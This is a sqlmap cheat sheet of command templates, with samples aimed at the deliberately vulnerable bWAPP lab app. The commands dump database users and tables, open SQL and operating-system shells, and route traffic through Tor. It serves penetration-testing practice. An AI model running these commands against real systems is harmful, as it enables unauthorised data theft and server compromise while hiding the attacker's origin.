
[SQLMAP]



PRE-REQS:
1. vulnerable field
2. auth required ?

0x1: GET BANNER

sqlmap -u "INSERT_VULN_URL" --cookie=" " -b

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -b
0x2: GET DATABASE USERS [CURRENT]

sqlmap -u "INSERT_VULN_URL" --cookie=" " --users

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --users
0x3: GET DATABASES

sqlmap -u "INSERT_VULN_URL" --cookie=" " --dbs

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --dbs
0x4: GET TABLES

sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME --tables

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP --tables
0x5: GET COLUMNS FROM TABLE

sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME -T TABLE_NAME --columns

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP -T users --columns
0x6: DUMP A TABLE

sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME -T TABLE_NAME --dump

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP -T users --dump
0x7: DUMP SPECIFIC COLUMNS

sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME -T TABLE_NAME -C column_name1,column_name2 --dump

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP -T users -C login,email --dump
0x8: GET INTERACTIVE DB SHELL

sqlmap -u "INSERT_VULN_URL" --cookie=" " --sql-shell

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --sql-shell
0x9: GET SYSTEM OS SHELL

sqlmap -u "INSERT_VULN_URL" --cookie=" " --os-shell

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --os-shell
0x10: USE PROXY TOR

sqlmap --tor --tor-type=SOCKS5 --check-tor -u "INSERT_VULN_URL" --cookie=" " -b

SAMPLE: sqlmap --tor --tor-type=SOCKS5 --check-tor -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -b
0x11: EXPLOIT SPECIFIC TECHNIQUE

sqlmap -u "INSERT_VULN_URL" --cookie=" " --technique=?

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --technique=U
0x12: USE REQUEST AS FILE

sqlmap -r [request_filename]

SAMPLE: sqlmap -r request.txt
NOTE: It can be used to validate an entire request for any vulnerability.

--is-dba = check whether the current user is a DBA; the result will be true or false
-p = specify the vulnerable parameter if it is not clear

NOTES:
1. Vulnerable field can be specified with the -p flag.
2. Most of the time, result files are stored in "/home/USER/.local/share/sqlmap/output/..."
3. Use Burp Suite to intercept the traffic to learn more about the authentication/session used.
4. Copy the request from Burp Suite to use it with sqlmap.
5. The request file of a login form can be used to see if the parameters are vulnerable.
